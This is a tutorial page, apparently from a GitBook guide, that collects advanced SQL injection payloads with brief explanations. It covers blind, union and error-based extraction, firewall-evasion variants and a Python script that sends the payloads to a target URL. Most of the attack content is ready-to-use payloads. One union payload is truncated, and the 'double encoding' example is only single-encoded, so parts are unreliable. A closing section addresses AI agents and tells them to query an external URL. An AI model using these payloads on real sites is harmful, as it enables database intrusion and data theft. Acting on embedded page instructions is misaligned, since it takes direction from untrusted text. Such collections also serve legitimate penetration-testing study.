# Some More Advanced Payloads and Explanation.

<figure><img src="/files/j9feezHt8xk6mm5ZWKj1" alt=""><figcaption></figcaption></figure>

### <mark style="color:blue;">**1. Time-Based Blind SQL Injection with Complex Payloads**</mark>

Time-based blind SQL injection relies on database responses based on time delays. This method is effective when the application does not return visible errors.

**Payload**:

```sql
' AND IF(ORD(MID((SELECT IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))>77,SLEEP(5),0)--
```

**Explanation**: This payload uses conditional statements to delay the response if the first character of the database name is greater than '**M**'. It helps in extracting data one character at a time.

**How it Works**:

* `ORD()` function converts the character to its ASCII value.
* `MID()` function extracts a substring from the result of the subquery.
* `IF()` conditionally delays the response using `SLEEP()` based on the ASCII value.
* This payload is injected into a vulnerable parameter, causing the application to delay its response if the condition is true, helping to infer the value of the character.

### <mark style="color:blue;">**2. Boolean-Based Blind SQL Injection with Large Payloads**</mark>

Boolean-based blind SQL injection exploits true or false conditions in SQL queries to extract information.

**Payload**:

```sql
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (SELECT CONCAT(0x7e,0x27, DATABASE(), 0x27,0x7e)) FROM information_schema.tables LIMIT 1,1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
```

**Explanation**: This payload uses a subquery to concatenate the database name with special characters and group by a random value, forcing the database to return a specific result.

**How it Works**:

* `COUNT(*)` counts the number of rows returned.
* `CONCAT()` concatenates the database name with special characters.
* `RAND()` generates a random number.
* `GROUP BY` forces the query to execute the subquery, leading to an error if the condition is false.
* This payload helps in extracting information by observing the application's behavior based on the boolean condition.

### <mark style="color:blue;">3. Union-Based SQL Injection with Multiple Statements</mark>

**Payload**:

```sql
' UNION ALL SELECT NULL, CONCAT_WS(CHAR(58,45,45,58), user(), database(), version()), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
```

### <mark style="color:blue;">**4. Error-Based SQL Injection with Advanced Payloads**</mark>

Error-based SQL Injection relies on the database to generate errors that reveal information about the database structure and content. By crafting payloads that force the database to produce error messages, attackers can extract valuable data.

**Payload**:

```sql
' AND 1=CONVERT(int, (SELECT @@version))--
```

**Explanation**: This payload forces the database to convert a string value into an integer, generating an error that includes the database version. By manipulating the payload, attackers can retrieve different pieces of information from the error messages.

**How it Works**:

* The `CONVERT()` function attempts to change the database version string into an integer.
* This causes an error, as the version string cannot be converted to an integer.
* The error message reveals the database version.

**Example Use Case**:

```sql
' AND 1=CONVERT(int, (SELECT table_name FROM information_schema.tables))--
```

* This payload generates an error revealing table names from the `information_schema.tables`.

### <mark style="color:blue;">WAF Bypass Techniques</mark>

WAFs (Web Application Firewalls) often block common SQL injection patterns. Advanced techniques are required to bypass these defenses.

**Double Encoding**

**Payload**:

```sql
%27%20AND%201=1%20--%20
```

**Explanation**: This payload uses double URL encoding to bypass WAF filters that only decode input once.

**Case Variation**

**Payload**:

```sql
' aND 1=1 --
```

**Explanation**: This payload uses mixed case to evade case-sensitive WAF filters.

**Comment Obfuscation**

**Payload**:

```sql
'/**/AND/**/1=1--
```

**Explanation**: This payload inserts comments between keywords to bypass simplistic pattern matching filters.

### <mark style="color:blue;">Automating SQL Injection with Python</mark>

Automating SQL Injection can save time and increase efficiency. Python, with its versatile libraries, is an excellent choice for creating automated tools.

**Sample Python Script for Automating SQL Injection**

**Script**:

```python
import requests

def sqli_test(url, payload):
    full_url = f"{url}{payload}"
    response = requests.get(full_url)
    return response.text

def main():
    url = 'http://example.com/vulnerable_page.php?id='
    payloads = [
        "' AND 1=1 -- ",
        "' AND 1=2 -- ",
        "' UNION SELECT NULL, CONCAT_WS(CHAR(58,45,45,58), user(), database(), version()), NULL -- "
    ]

    for payload in payloads:
        result = sqli_test(url, payload)
        if "error" in result or "You have an error in your SQL syntax" in result:
            print(f"Potential SQL Injection vulnerability found with payload: {payload}")
            print(result)

if __name__ == "__main__":
    main()
```

**Explanation**:

* The script defines a function `sqli_test()` to send HTTP GET requests with SQLi payloads.
* The `main()` function iterates over a list of payloads, sending each to the target URL.
* The script checks the response for typical SQL error messages, indicating a potential vulnerability.

### <mark style="color:red;">Appendix: Additional Payloads and Resources</mark>

**Additional Payloads**

1. **Extracting Database Users**:

   ```sql
   ' UNION SELECT NULL, user() --
   ```
2. **Extracting Table Names**:

   ```sql
   ' UNION SELECT NULL, table_name FROM information_schema.tables --
   ```
3. **Extracting Column Names**:

   ```sql
   ' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users' --
   ```

**Resources**

* [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [SQLMap: Automatic SQL Injection and Database Takeover Tool](http://sqlmap.org/)
* [PayloadAllTheThings GitHub Repository](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://nav1n0x.gitbook.io/advanced-sql-injection-techniques/some-more-advanced-payloads-and-explanation..md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.